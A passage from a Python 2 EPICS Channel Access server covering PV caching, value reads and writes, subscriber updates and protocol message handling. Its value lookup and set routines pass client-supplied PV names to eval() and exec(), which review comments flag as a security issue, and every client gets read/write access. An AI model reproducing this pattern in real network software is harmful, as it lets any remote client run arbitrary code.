    """A cached PV value together with the time it was recorded."""
    def __init__(self,value,time):
        self.value = value
        self.time = time
    def __repr__(self): return "(%r,%s)" % (self.value,date_string(self.time))
def PV_exists(PV_name):
    """Has a process variable with the given name been defined?"""
    # A PV "exists" exactly when it currently resolves to a value.
    return PV_value(PV_name) is not None
def PV_value(PV_name,cached=True):
    """The value of a process variable as Python data type.
    If the process variable has not been defined return None.
    cached: serve from the module cache while the entry is younger than
    cache_timeout; otherwise re-read and refresh the cache."""
    from time import time
    if cached and PV_name in cache:
        if time() <= cache[PV_name].time + cache_timeout:
            ##if DEBUG: debug("%s in cache" % PV_name)
            return cache[PV_name].value
        ##if DEBUG: debug("%s expired from cache" % PV_name)
    value = PV_current_value(PV_name)
    cache[PV_name] = cache_entry(value,time())
    return value
def PV_current_value(PV_name):
    """The current value of a process variable as Python data type,
    bypassing the cache. If the process variable has not been defined
    return None."""
    from time import time
    t0 = time()
    value = PV_value_or_object(PV_name)
    # If value is an object, report its member names instead of the object.
    if isobject(value): value = "<record: %s>" % ", ".join(members(value))
    ##if DEBUG: debug("%s: current value %r (%.3f s)" % (PV_name,value,time()-t0))
    return value
def PV_value_or_object(PV_name):
    """The current value of a process variable as Python data type.
    If the process variable has not been defined return None.
    Resolution order: registered objects (by prefix), registered
    properties, object_instance records, then the plain PVs table.
    (Python 2 code.)"""
    for object,name in registered_objects:
        if PV_name.startswith(name):
            attribute = PV_name[len(name):]
            ##try: return eval("object"+attribute+".value")
            ##except: pass
            # SECURITY NOTE(review): the attribute path comes from the PV
            # name supplied by CA clients and is passed to eval().
            try: return eval("object"+attribute)
            except: pass
    if PV_name in registered_properties:
        object,property_name = registered_properties[PV_name]
        try: return getattr(object,property_name)
        except Exception,msg:
            error("%s: %r.%s: %s" % (PV_name,object,property_name,msg))
    record = object_instance(PV_name)
    if record: return getattr(record,object_property(PV_name))
    if PV_name in PVs.keys(): return PVs[PV_name].value
    return None
def isobject(x):
    """Is x a class object?"""
    # Anything sized (arrays, strings) is treated as data, not an object.
    if hasattr(x,"__len__"): return False
    return hasattr(x,"__dict__")
def members(x):
    """Return the non-dunder attribute names of *x*.

    x: class object
    Return value: list of strings
    """
    # Cleanup: dropped an unused 'function' local and commented-out
    # filtering left over from an earlier revision; same output.
    return [name for name in dir(x)
            if not (name.startswith("__") and name.endswith("__"))]
def PV_set_value(PV_name,value):
    """Modify the local value of a process variable
    (The value retrieved by 'PV_value').
    Tries, in order: registered objects (via attribute path), registered
    properties, object_instance records; always updates the PVs table,
    the cache and notifies subscribed clients. (Python 2 code.)"""
    if DEBUG: debug("set %s = %r" % (PV_name,value))
    # Convert value to the correct data type.
    # The value of a PV might be passed as string when the PV type is actually
    # DOUBLE.
    value = convert(PV_name,value)
    if DEBUG: debug("converted %r to %r" % (PV_name,value))
    for object,name in registered_objects:
        if PV_name.startswith(name+"."):
            attribute = PV_name[len(name+"."):]
            PV_object_name = "object."+attribute
            # SECURITY NOTE(review): the attribute path comes from the PV
            # name supplied by CA clients and is fed to eval()/exec below.
            try: PV_object = eval(PV_object_name)
            except Exception,exception:
                if DEBUG: debug("%s: %s" % (PV_object_name,exception))
                continue
            if hasattr(PV_object,"value"):
                # The target is itself a PV-like object: write its .value.
                code = "object.%s.value = %r" % (attribute,value)
                from numpy import nan,inf # needed for exec
                try:
                    exec(code)
                    if DEBUG: debug("Tried %s: OK" % code.replace("object",name))
                    continue
                except Exception,exception:
                    if DEBUG: debug("Tried %s: failed: %s" % (code,exception))
            else:
                if not ("." in attribute or "[" in attribute):
                    # Simple attribute: a plain setattr suffices.
                    try:
                        setattr(object,attribute,value)
                        if DEBUG: debug("Tried setattr(%s,%s,%r): OK" %
                            (name,attribute,value))
                    except Exception,exception:
                        if DEBUG: debug("Tried setattr(%s,%s,%r): %s" %
                            (name,attribute,value,exception))
                else:
                    # Nested attribute or item access: requires exec.
                    code = "object.%s = %r" % (attribute,value)
                    from numpy import nan,inf # needed for exec
                    try:
                        exec(code)
                        if DEBUG: debug("Tried %s: OK" % code.replace("object",name))
                        continue
                    except Exception,exception:
                        if DEBUG: debug("Tried %s: failed: %s" % (code,exception))
    if PV_name in registered_properties:
        object,property_name = registered_properties[PV_name]
        try: setattr(object,property_name,value)
        except Exception,msg:
            error("%s: %r.%s = %r: %s",(PV_name,object,property_name,value,msg))
    record = object_instance(PV_name)
    if record:
        setattr(record,object_property(PV_name),value)
    # Always keep the local table, the cache and the clients in sync.
    if not PV_name in PVs.keys(): PVs[PV_name] = PV_info()
    PV = PVs[PV_name]
    PV.value = value
    from time import time
    PV.last_updated = time()
    cache[PV_name] = cache_entry(value,PV.last_updated)
    notify_subscribers(PV_name)
def call_callbacks(PV_name):
    """Invoke every callback and writer routine registered for this PV,
    then notify subscribed clients."""
    if PV_name not in PVs.keys(): return
    pv = PVs[PV_name]
    if len(pv.callbacks) > 0:
        char_value = "%r" % pv.value
        # Each callback runs in its own daemon thread to avoid deadlock in
        # case the function itself calls "caput" or "caget".
        from threading import Thread
        for callback in pv.callbacks:
            if DEBUG: debug("%s: calling '%s'" % (PV_name,object_name(callback)))
            worker = Thread(
                target=callback,
                args=(PV_name,pv.value,char_value),
                name="callback %s" % callback,
            )
            worker.daemon = True
            worker.start()
    if len(pv.writers) > 0:
        from datetime import datetime
        timestamp = datetime.fromtimestamp(pv.last_updated)
        line = "%s %s %r\n" % (PV_name,timestamp,pv.value)
        for writer in pv.writers:
            if DEBUG: debug("%s: calling '%s'" % (PV_name,object_name(writer)))
            writer(line)
    notify_subscribers(PV_name)
def PV_subscribers(PV_name):
    """IP address/ports of clients are connected to a process variable.
    Return value: list of (string,integer) tuples"""
    pv = PVs.get(PV_name)
    if pv is None: return []
    return pv.subscribers.keys()
def PV_nsubscribers(PV_name):
    """Number of clients currently connected to a process variable."""
    subscribers = PV_subscribers(PV_name)
    return len(subscribers)
def PV_connected(PV_name):
    """Is there a client currently subscribing to this process variable?"""
    return PV_nsubscribers(PV_name) > 0
def notify_subscribers_if_changed(PV_name,new_value):
    """Send update events to all clients monitoring the given process variable
    if the new value is different than the current value.
    new_value = None means the PV could not be read; no event is sent."""
    ##if DEBUG: debug("notify_subscribers_if_changed(%r,%r)" % (PV_name,new_value))
    if not PV_name in PVs.keys(): return
    PV = PVs[PV_name]
    if new_value is None:
        if DEBUG: info("CA: notify_subscribers_if_changed: %s = %s" % (PV_name,new_value))
        ##delete_PV(PV_name)
        return
    ##if DEBUG: debug("PV %r, old value %r, new value %r: equal? %r" %
    ##    (PV_name,PV.value,new_value,nan_equal(new_value,PV.value)))
    # nan_equal treats NaN as equal to NaN, so a PV stuck at NaN does not
    # generate a continuous stream of update events.
    if nan_equal(new_value,PV.value): return
    # Snapshot arrays/lists by value so later in-place mutation of the
    # source does not silently change the stored PV value.
    new_value = PV_data(new_value)
    ##if DEBUG: debug("Updating PV %r, old value %r, new value %r" %
    ##    (PV_name,PV.value,new_value))
    PV.value = new_value
    from time import time
    PV.last_updated = time()
    for address in PV.subscribers.keys():
        # Notify connected clients that process variable has changed.
        subscriber = PV.subscribers[address]
        # Make sure client is interested in receiving update notifications.
        if subscriber.subscription_ID == None: continue
        # Make sure client is still connected.
        if not address in connections: continue
        connection = connections[address]
        status_code = 1 # Normal successful completion
        data = network_data(new_value,subscriber.data_type)
        subscriber.data_count = CA_count(new_value)
        send(connection,message("EVENT_ADD",0,subscriber.data_type,
            subscriber.data_count,status_code,subscriber.subscription_ID,
            data))
def notify_subscribers(PV_name):
    """Send update events to all clients monitoring the given process variable,
    unconditionally (see 'notify_subscribers_if_changed' for the
    change-detecting variant)."""
    if not PV_name in PVs.keys(): return
    PV = PVs[PV_name]
    value = PV_value(PV_name)
    if value is None:
        # PV could not be read; do not push an event.
        if DEBUG: info("CA: notify_subscribers: %s=%r" % (PV_name,value))
        ##delete_PV(PV_name)
        return
    for address in PV.subscribers.keys():
        # Guard against concurrent removal while iterating the snapshot of keys.
        if not address in PV.subscribers: continue
        # Notify connected clients that process variable has changed.
        subscriber = PV.subscribers[address]
        # Make sure client is interested in receiving update notifications.
        if subscriber.subscription_ID == None: continue
        # Make sure client is still connected.
        if not address in connections: continue
        connection = connections[address]
        status_code = 1 # Normal successful completion
        data = network_data(value,subscriber.data_type)
        subscriber.data_count = CA_count(value)
        send(connection,message("EVENT_ADD",0,subscriber.data_type,
            subscriber.data_count,status_code,subscriber.subscription_ID,
            data))
def delete_PV(PV_name):
    """Remove a process variable that no longer exists, after telling its
    subscribers (see 'disconnect_PV')."""
    disconnect_PV(PV_name)
    if DEBUG: info("CAServer: deleting PV %r" % PV_name)
    PVs.pop(PV_name)
def disconnect_PV(PV_name):
    """Notify subscribers that PV no longer exists.
    Sends an EVENT_CANCEL message to every still-connected, subscribed
    client, then clears the subscriber table."""
    if not PV_name in PVs.keys(): return
    PV = PVs[PV_name]
    for address in PV.subscribers.keys():
        subscriber = PV.subscribers[address]
        # Make sure client is interested in receiving update notifications.
        if subscriber.subscription_ID == None: continue
        # Make sure client is still connected.
        if not address in connections: continue
        connection = connections[address]
        send(connection,message("EVENT_CANCEL",0,subscriber.data_type,
            subscriber.data_count,PV.channel_SID,subscriber.subscription_ID))
    # Bug fix: 'subscribers' is a dict keyed by client address everywhere
    # else (e.g. 'PV.subscribers[address] = ...' in the EVENT_ADD handler);
    # resetting it to a list ([]) broke any later subscription. Reset to an
    # empty dict instead.
    PV.subscribers = {}
def PV_data(value):
    """If value is an array or a list, return the current content of the
    array (a by-value snapshot), rather than a reference to the array.
    Strings and non-sliceable scalars are returned unchanged."""
    if isinstance(value,basestring): return value
    # Scalars (int, float, ...) raise TypeError on slicing and pass through.
    # Narrowed from a bare 'except:' so KeyboardInterrupt/SystemExit are
    # not silently swallowed.
    try: value = list(value[:])
    except Exception: pass
    return value
def PV_names():
    """List of all currently defined process variables."""
    return [pv.__name__ for pv in PV.instances]
def connected_PVs():
    """All currently active process variables, with clients connected to them.
    Return value: list of strings"""
    names = PVs.keys()
    return [name for name in names if PV_connected(name)]
def update_all_PVs():
    """Send update events to all connected clients for the PVs which have
    changed since the last update."""
    for name in connected_PVs():
        latest = PV_value(name,cached=False)
        notify_subscribers_if_changed(name,latest)
update_interval = 1.0 # Waiting time between PV updates in seconds.
def update_all_PVs_loop():
    """Keep polling actively subscribed PVs for changes and send update events
    to connected clients. Runs forever; intended to run in a daemon thread
    (see 'start_server')."""
    from time import sleep
    while True:
        sleep(update_interval)
        update_all_PVs()
def properties(object):
    """List of property names of a given class object: every attribute from
    dir() that is neither a dunder nor callable."""
    def is_dunder(n): return n.startswith("__") and n.endswith("__")
    return [n for n in dir(object)
        if not is_dunder(n) and not callable(getattr(object,n))]
def object_instance(PV_name):
    """The PV class object hosting a given process variable.
    If not found the return value is None."""
    for candidate in PV.instances:
        if candidate.__name__ != PV_name: continue
        return candidate
    return None
def object_property(PV_name):
    """The name of the property of a PV class object, hosting a given
    process variable. If not found, the return value is None."""
    # PV class instances always host their value under the "value" property.
    if any(pv.__name__ == PV_name for pv in PV.instances): return "value"
    return None
# CA Message command codes:
commands = {
    "VERSION": 0,
    "EVENT_ADD": 1,
    "EVENT_CANCEL": 2,
    "READ": 3,
    "WRITE": 4,
    "SNAPSHOT": 5,
    "SEARCH": 6,
    "BUILD": 7,
    "EVENTS_OFF": 8,
    "EVENTS_ON": 9,
    "READ_SYNC": 10,
    "ERROR": 11,
    "CLEAR_CHANNEL": 12,
    "RSRV_IS_UP": 13,
    "NOT_FOUND": 14,
    "READ_NOTIFY": 15,
    "READ_BUILD": 16,
    "CREATE_CHAN": 18,
    "WRITE_NOTIFY": 19,
    "CLIENT_NAME": 20,
    "HOST_NAME": 21,
    "ACCESS_RIGHTS": 22,
    "ECHO": 23,
    "SIGNAL": 25,
    "CREATE_CH_FAIL": 26,
    "SERVER_DISCONN": 27,
}
def command_name(command_code):
    """'VERSION', 'EVENT_ADD', ...; the numeric code as a string for
    unknown commands."""
    # Reverse lookup by scanning items: 'commands.keys()[...]' indexing is
    # Python-2-only (dict views are not indexable) and built two throwaway
    # lists per call.
    for name,code in commands.items():
        if code == command_code: return name
    return str(command_code)
# CA Payload Data Types:
types = {
    "STRING": 0,
    "SHORT": 1,
    "FLOAT": 2,
    "ENUM": 3,
    "CHAR": 4,
    "LONG": 5,
    "DOUBLE": 6,
    "STS_STRING": 7,
    "STS_SHORT": 8,
    "STS_FLOAT": 9,
    "STS_ENUM": 10,
    "STS_CHAR": 11,
    "STS_LONG": 12,
    "STS_DOUBLE": 13,
    "TIME_STRING": 14,
    "TIME_SHORT": 15,
    "TIME_FLOAT": 16,
    "TIME_ENUM": 17,
    "TIME_CHAR": 18,
    "TIME_LONG": 19,
    "TIME_DOUBLE": 20,
    "GR_STRING": 21,
    "GR_SHORT": 22,
    "GR_FLOAT": 23,
    "GR_ENUM": 24,
    "GR_CHAR": 25,
    "GR_LONG": 26,
    "GR_DOUBLE": 27,
    "CTRL_STRING": 28,
    "CTRL_SHORT": 29,
    "CTRL_FLOAT": 30,
    "CTRL_ENUM": 31,
    "CTRL_CHAR": 32,
    "CTRL_LONG": 33,
    "CTRL_DOUBLE": 34,
}
def type_name(data_type):
    """Channel Access data type as string. data_type: integer number.
    Unknown codes are returned as their decimal string."""
    # Reverse lookup by scanning items: 'types.keys()[...]' indexing is
    # Python-2-only (dict views are not indexable) and built two throwaway
    # lists per call.
    for name,code in types.items():
        if code == data_type: return name
    return str(data_type)
# Return status codes (ECA_* status of Channel Access operations):
status_codes = {
    "NORMAL": 0,
    "MAXIOC": 1,
    "UKNHOST": 2,
    "UKNSERV": 3,
    "SOCK": 4,
    "CONN": 5,
    "ALLOCMEM": 6,
    "UKNCHAN": 7,
    "UKNFIELD": 8,
    "TOLARGE": 9,
    "TIMEOUT": 10,
    "NOSUPPORT": 11,
    "STRTOBIG": 12,
    "DISCONNCHID": 13,
    "BADTYPE": 14,
    "CHIDNOTFND": 15,
    "CHIDRETRY": 16,
    "INTERNAL": 17,
    "DBLCLFAIL": 18,
    "GETFAIL": 19,
    "PUTFAIL": 20,
    "ADDFAIL": 21,
    "BADCOUNT": 22,
    "BADSTR": 23,
    "DISCONN": 24,
    "DBLCHNL": 25,
    "EVDISALLOW": 26,
    "BUILDGET": 27,
    "NEEDSFP": 28,
    "OVEVFAIL": 29,
    "BADMONID": 30,
    "NEWADDR": 31,
    "NEWCONN": 32,
    "NOCACTX": 33,
    "DEFUNCT": 34,
    "EMPTYSTR": 35,
    "NOREPEATER": 36,
    "NOCHANMSG": 37,
    "DLCKREST": 38,
    "SERVBEHIND": 39,
    "NOCAST": 40,
    "BADMASK": 41,
    "IODONE": 42,
    "IOINPROGRESS": 43,
    "BADSYNCGRP": 44,
    "PUTCBINPROG": 45,
    "NORDACCESS": 46,
    "NOWTACCESS": 47,
    "ANACHRONISM": 48,
    "NOSEARCHADDR": 49,
    "NOCONVERT": 50,
    "BADCHID": 51,
    "BADFUNCPTR": 52,
    "ISATTACHED": 53,
    "UNAVAILINSERV": 54,
    "CHANDESTROY": 55,
    "BADPRIORITY": 56,
    "NOTTHREADED": 57,
    "16KARRAYCLIENT": 58,
    "CONNSEQTMO": 59,
    "UNRESPTMO": 60,
}
# Severity component of a CA status code.
severities = {
    "WARNING": 0,
    "SUCCESS": 1,
    "ERROR": 2,
    "INFO": 3,
    "SEVERE": 4,
    "FATAL": 6,
}
# Protocol version 4.11:
major_version = 4
minor_version = 11
# CA server port = 5056 + major version * 2 = 5064
# CA repeater port = 5056 + major version * 2 + 1 = 5065
TCP_port_number = 5064 # fixed
UDP_port_number = 5064 # default, may be different if multiple servers running
# Guards start_server() against being run more than once.
server_started = False
def start_server():
    """Start the CA server: the UDP name-resolution service, the TCP data
    service, and the PV polling loop, each in its own daemon thread.
    Idempotent: subsequent calls are no-ops."""
    global server_started
    if server_started: return
    server_started = True
    UDP_server = UDPServer(("",UDP_port_number),UDPHandler)
    from threading import Thread
    task = Thread(target=UDP_server.serve_forever,name="UDP_server.serve_forever")
    task.daemon = True
    task.start()
    # Multiple CA servers may run on the same machine listening at the same UDP
    # port number 5064.
    # However, only the first server started can use TCP port 5064, the others
    # have to use different port numbers (5065,5066,...).
    global TCP_port_number
    while True:
        from socket import error as socket_error
        try:
            TCP_server = ThreadingTCPServer(("",TCP_port_number),TCPHandler)
            break
        except socket_error: TCP_port_number += 1
    if DEBUG: debug("server version %s, listening on TCP/UDP port %d." % (__version__,TCP_port_number))
    task = Thread(target=TCP_server.serve_forever,name="TCP_server.serve_forever")
    task.daemon = True
    task.start()
    # Keep polling actively subscribed PVs and sending updates to connected
    # clients.
    task = Thread(target=update_all_PVs_loop,name="update_all_PVs_loop")
    task.daemon = True
    task.start()
import SocketServer
class UDPServer(SocketServer.UDPServer,SocketServer.ThreadingMixIn):
    """UDP server with customized socket options, allowing several CA
    servers to share the same UDP port."""
    # No long timeout for restarting the server ("port in use")
    allow_reuse_address = True
    # Ctrl-C will cleanly kill all spawned threads
    daemon_threads = True
    def server_bind(self):
        """Called by constructor to bind the socket.
        Sets SO_REUSEADDR (and SO_REUSEPORT where available) before
        binding."""
        import socket
        if self.allow_reuse_address:
            # Without using the option SO_REUSEADDR, only one process can
            # listen on a given UDP port number (error 'Address already in use').
            # Also, without this option, one would have to wait 60 seconds
            # after the server terminates, before another process can bind to
            # the same port number, the time the socket remains in
            # CLOSED_WAIT" state.
            self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
            if hasattr(socket,"SO_REUSEPORT"):
                # SO_REUSEPORT allows completely duplicate bindings by multiple
                # processes if they all set SO_REUSEPORT before binding the port.
                # This option permits multiple instances of a program to each
                # receive UDP/IP multicast or broadcast datagrams destined for the
                # bound port.
                # This option is needed for Mac OS X. On Linux, it is sufficient to
                # set SO_REUSEADDR.
                self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEPORT,1)
        self.socket.bind(self.server_address)
        self.server_address = self.socket.getsockname()
class ThreadingTCPServer(SocketServer.ThreadingTCPServer,SocketServer.ThreadingMixIn):
    """TCP server handling each client connection in its own thread."""
    # No long timeout for restarting the server ("port in use")
    import os
    if os.name == "nt": allow_reuse_address = False # Windows
    else: allow_reuse_address = True # Linux and Mac OS X
    # Ctrl-C will cleanly kill all spawned threads
    daemon_threads = True
class UDPHandler(SocketServer.BaseRequestHandler):
    """Handles one incoming UDP datagram: splits it into CA messages,
    processes each, and sends any reply back to the sender."""
    def handle(self):
        addr = "%s:%d" % self.client_address
        from socket import error as socket_error
        # For a UDP server, self.request is (data, socket).
        messages = self.request[0]
        # Several replies may be concatenated. Break them up.
        while len(messages) > 0:
            # The minimum message size is 16 bytes. If the 'payload size'
            # field has value > 0, the total size is 16+'payload size'.
            from struct import unpack
            payload_size, = unpack(">H",messages[2:4])
            message = messages[0:16+payload_size]
            messages = messages[16+payload_size:]
            ##if DEBUG: debug("%s: UDP packet received: %s\n" % (addr,message_info(message)))
            reply = process_message(self.client_address,message)
            if reply:
                if DEBUG: debug("%s: returning reply %r" % (addr,message_info(reply)))
                self.request[1].sendto(reply,self.client_address)
connections = {} # active client TCP connections, keyed by client address
class TCPHandler(SocketServer.BaseRequestHandler):
    """Serves one CA client TCP connection: reads messages one at a time,
    dispatches them to process_message, and sends back any reply. On
    disconnect, removes the client from all PV subscriber tables."""
    def handle(self):
        addr = "%s:%d" % self.client_address
        if DEBUG: debug("%s: accepted connection" % addr)
        # Update list of active client connections.
        connections[self.client_address] = self.request
        while 1:
            import socket
            # Several messages may be concatenated. Read one at a time.
            # The minimum message size is 16 bytes.
            try: message = self.request.recv(16)
            except socket.error:
                if DEBUG: debug("%s: lost connection\n" % addr)
                break
            if len(message) == 0:
                if DEBUG: debug("%s: client disconnected" % addr)
                break
            if len(message) < 4:
                # Bug fix: debug message said "excepted"; meant "expected".
                if DEBUG: debug("expected 4 received %d bytes" % len(message))
                break
            # If the 'payload size' field has value > 0, 'payload size'
            # more bytes are part of the message.
            from struct import unpack
            payload_size, = unpack(">H",message[2:4])
            if payload_size > 0:
                # NOTE(review): a single recv() may return fewer than
                # payload_size bytes, and a failure here falls through to
                # process a truncated message — TODO confirm/loop on recv.
                try: message += self.request.recv(payload_size)
                except socket.error:
                    if DEBUG: debug("%s: lost connection\n" % addr)
            if DEBUG: debug("%s: received: %s\n" % (addr,message_info(message)))
            reply = process_message(self.client_address,message)
            if reply:
                if DEBUG: debug("%s: returning reply %r" % (addr,message_info(reply)))
                try: self.request.sendall(reply)
                except socket.error:
                    if DEBUG: debug("%s: lost connection\n" % addr)
        # Update list of active client connections.
        for PV in PVs.values():
            if self.client_address in PV.subscribers:
                del PV.subscribers[self.client_address]
        del connections[self.client_address]
        if DEBUG: debug("%s: closing connection" % addr)
        self.request.close()
def process_message(address,request):
    """Interpret a CA protocol datagram.
    address: (host,port) tuple identifying the client
    request: raw message bytes (16-byte header + optional payload)
    Returns the reply datagram as a string, or None if the command has
    no reply."""
    from struct import unpack
    from time import time
    # Pad short datagrams so the header always unpacks.
    header = request[0:16].ljust(16,'\0')
    payload = request[16:]
    command_code,payload_size,data_type,data_count,parameter1,parameter2 = \
        unpack(">HHHHII",header)
    command = command_name(command_code)
    if command == "SEARCH":
        # Client wants to know whether this server hosts a specific
        # process variable
        reply_flag = data_type
        minor_version = data_count
        channel_CID = parameter1 # client allocated ID for this transaction.
        channel_name = payload.rstrip("\0")
        if PV_exists(channel_name):
            if DEBUG: debug("SEARCH,reply_flag=%r,minor_ver=%r,channel_CID=%r,channel_name=%r\n"
                % (reply_flag,minor_version,channel_CID,channel_name))
            return message("SEARCH",8,TCP_port_number,0,0xffffffff,channel_CID,
                network_data(minor_version,types["SHORT"]))
        # Reply flag: whether failed search response should be returned.
        # 10 = do reply, 5 = do not reply
        if reply_flag == 10:
            return message("NOT_FOUND",0,reply_flag,minor_version,channel_CID,
                channel_CID)
    elif command == "VERSION":
        # Client 'greeting' after opening a TCP connection, part 1
        # There is no response to this command.
        pass
        ##if DEBUG: debug("VERSION\n")
    elif command == "CLIENT_NAME":
        # Client 'greeting' after opening a TCP connection, part 2
        # There is no response to this command.
        if DEBUG: debug("CLIENT_NAME\n")
    elif command == "HOST_NAME":
        # Client 'greeting' after opening a TCP connection, part 3
        # There is no response to this command.
        if DEBUG: debug("HOST_NAME\n")
    elif command == "CREATE_CHAN":
        # Client requests "session identity" for a process variable passed by
        # name.
        channel_CID = parameter1
        minor_version = parameter2
        channel_name = payload.rstrip("\0")
        if DEBUG: debug("CREATE_CHAN channel_CID=%r, minor_version=%r" %
            (channel_CID,minor_version))
        if not PV_exists(channel_name): return
        if not channel_name in PVs.keys(): PVs[channel_name] = PV_info()
        PV = PVs[channel_name]
        val = PV_value(channel_name)
        data_type = CA_type(val)
        data_count = CA_count(val)
        if PV.channel_SID == None:
            # Allocate the smallest server ID not yet in use.
            channel_SIDs = [pv.channel_SID for pv in PVs.values()]
            PV.channel_SID = 1
            while PV.channel_SID in channel_SIDs: PV.channel_SID += 1
        reply = message("CREATE_CHAN",0,data_type,data_count,channel_CID,
            PV.channel_SID)
        access_rights = 3 # Read and write
        reply += message("ACCESS_RIGHTS",0,0,0,channel_CID,access_rights)
        return reply
    elif command == "READ_NOTIFY":
        # Client wants to know the current value of a process variable,
        # referenced by server ID, without receiving update events.
        # Channel Access Protocol Specification, section 6.15.2, says:
        # parameter 1: channel_SID, parameter 2: IOID
        # However, I always get: parameter 1 = 1, parameter 2 = 1.
        # Thus, I assume:
        # parameter 1: status_code, parameter 2: IOID
        # status_code = 1 indicates normal successful completion
        channel_SID = parameter1
        IOID = parameter2
        if DEBUG: debug("READ_NOTIFY data_type=%r,data_count=%r,channel_SID=%r,IOID=%r"
            % (data_type,data_count,channel_SID,IOID))
        for PV_name in PVs.keys():
            PV = PVs[PV_name]
            if PV.channel_SID == channel_SID:
                status_code = 1 # Normal successful completion
                val = PV_value(PV_name)
                data_count = CA_count(val)
                data = network_data(val,data_type)
                reply = message("READ_NOTIFY",0,data_type,data_count,status_code,
                    IOID,data)
                return reply
    elif command == "EVENT_ADD":
        # Client wants to receive update events for a given process variable.
        channel_SID = parameter1
        subscription_ID = parameter2
        low_val,high_val,to_val,mask = unpack(">fffH",payload[0:14])
        if DEBUG: debug("EVENT_ADD {data_type:%s, data_count:%r, "\
            "channel_SID:%r, subscription_ID:%r}, "\
            "payload={low_val:%r, high_val:%r, to_val:%r, mask:%r}"
            % (type_name(data_type),data_count,channel_SID,subscription_ID,
            low_val,high_val,to_val,mask))
        for PV_name in PVs.keys():
            PV = PVs[PV_name]
            if PV.channel_SID == channel_SID:
                PV.subscribers[address] = \
                    subscriber_info(subscription_ID,data_type,data_count)
                subscriber = PV.subscribers[address]
                status_code = 1 # Normal successful completion
                val = PV_value(PV_name)
                data_count = CA_count(val)
                data = network_data(val,data_type)
                # The first event (current value) is returned immediately.
                return message("EVENT_ADD",0,data_type,data_count,
                    status_code,subscription_ID,data)
    elif command == "WRITE_NOTIFY":
        # Client wants to modify a process variable.
        # This request needs to be confirmed by a WRITE_NOTIFY reply when
        # complete.
        channel_SID = parameter1
        IOID = parameter2
        new_value = value(data_type,data_count,payload)
        if DEBUG: debug("WRITE_NOTIFY data_type=%r, data_count=%r, channel_SID=%r, "\
            "IOID=%r, value=%r\n" %
            (data_type,data_count,channel_SID,IOID,new_value))
        for PV_name in PVs.keys():
            PV = PVs[PV_name]
            if PV.channel_SID == channel_SID:
                if DEBUG: debug("Changing %r to %r\n" % (PV_name,new_value))
                PV_set_value(PV_name,new_value)
                call_callbacks(PV_name)
                status_code = 1 # Normal successful completion
                reply = message("WRITE_NOTIFY",0,data_type,data_count,
                    status_code,IOID)
                return reply
    elif command == "ACCESS_RIGHTS": # not a client request (server only)
        channel_ID = parameter1
        access_bits = parameter2
        if DEBUG: debug("ACCESS_RIGHTS channel_ID=%r, access_bits=%s (ignored)\n" %
            (channel_ID,access_bits))
    elif command == "WRITE":
        # Client wants to modify a process variable.
        # Unlike WRITE_NOTIFY, there is no response to this command.
        channel_SID = parameter1
        IOID = parameter2
        new_value = value(data_type,data_count,payload)
        if DEBUG: debug("WRITE data_type=%r, data_count=%r, channel_SID=%r, "\
            "IOID=%r, value=%r\n" %
            (data_type,data_count,channel_SID,IOID,new_value))
        for PV_name in PVs.keys():
            PV = PVs[PV_name]
            if PV.channel_SID == channel_SID:
                if DEBUG: debug("Changing %r to %r\n" % (PV_name,new_value))
                PV_set_value(PV_name,new_value)
                call_callbacks(PV_name)
    elif command == "ECHO":
        # Client wants to be sure that server is still alive and reachable.
        return message("ECHO",0,0,0,0,0)
    elif command == 'EVENT_CANCEL':
        # Opposite of EVENT_ADD.
        # Client no longer wants to receive update events.
        channel_SID = parameter1
        subscription_ID = parameter2
        if DEBUG: debug("EVENT_CANCEL {data_type:%s,data_count:%r, "\
            "channel_SID:%r,subscription_ID:%r},"
            % (type_name(data_type),data_count,channel_SID,subscription_ID))
        for PV_name in PVs.keys():
            PV = PVs[PV_name]
            if PV.channel_SID == channel_SID:
                if address in PV.subscribers and \
                    PV.subscribers[address].subscription_ID == subscription_ID:
                    del PV.subscribers[address]
                    if DEBUG: debug("Cancelled updates for %r %r" % (PV_name,address))
    elif command == 'CLEAR_CHANNEL':
        # Opposite of CREATE_CHAN. Client indicates it will not use a certain
        # client ID for a PV any longer.
        channel_SID = parameter1
        channel_CID = parameter2
        if DEBUG: debug("CLEAR_CHANNEL channel_SID=%r, channel_CID=%r" %
            (channel_SID,channel_CID))
        # Nothing to do, because there is no status information associated
        # with a channel CID. There are no resources allocated per-channel CID.
        return message('CLEAR_CHANNEL',0,0,0,channel_SID,channel_CID)
    else:
        if DEBUG: debug("command %r: not supported (yet)\n" % command)
def object_name(object):
    """Human-readable name of a Python object: its __name__ if it has one,
    otherwise its repr."""
    named = hasattr(object,"__name__")
    return object.__name__ if named else repr(object)
def message(command=0,payload_size=0,data_type=0,data_count=0,
        parameter1=0,parameter2=0,payload=""):
    """Assemble a Channel Access message datagram for network transmission.
    command: integer command code, or its name (e.g. "EVENT_ADD")
    payload_size: 0 = derive from len(payload), rounded up to a multiple of 8
    Returns the 16-byte header followed by the NUL-padded payload."""
    if type(command) == str: command = commands[command]
    assert data_type is not None
    assert data_count is not None
    assert parameter1 is not None
    assert parameter2 is not None
    from math import ceil
    from struct import pack
    if payload_size == 0 and len(payload) > 0:
        # CA requires the payload length to be a multiple of 8 bytes.
        payload_size = int(ceil(len(payload)/8.)*8)
    # Pad in one step instead of the original byte-at-a-time += loop
    # (which rebuilt the string on every iteration).
    payload = payload.ljust(payload_size,"\0")
    # 16-byte header consisting of four 16-bit integers
    # and two 32-bit integers in big-endian byte order.
    header = pack(">HHHHII",command,payload_size,data_type,data_count,
        parameter1,parameter2)
    message = header + payload
    return message
def message_info(message):
    """Text representation of the CA message datagram (for debug logging)."""
    from struct import unpack
    if len(message) < 16: return "invalid message %r" % message
    header = message[0:16]
    payload = message[16:]
    command_code,payload_size,data_type,data_count,parameter1,parameter2 = \
        unpack(">HHHHII",header)
    s = str(command_code)
    command = command_name(command_code)
    if command: s += "("+command+")"
    s += ","+str(payload_size)
    s += ","+str(data_type)
    if data_type in types.values():
        # Use the shared reverse lookup instead of indexing dict.keys(),
        # which is Python-2-only and duplicated type_name's logic.
        s += "("+type_name(data_type)+")"
    s += ","+str(data_count)
    s += ", %r, %r" % (parameter1,parameter2)
    if payload:
        s += ", %r" % payload
        if command in ("EVENT_ADD","WRITE","WRITE_NOTIFY","READ_NOTIFY"):
            # Decode and append the payload's value and any status/time/
            # graphic/control header.
            s += "("
            header = header_info(data_type,payload)
            if header: s += header+"; "
            s += repr(value(data_type,data_count,payload))
            s += ")"
    return s
def send(socket,message):
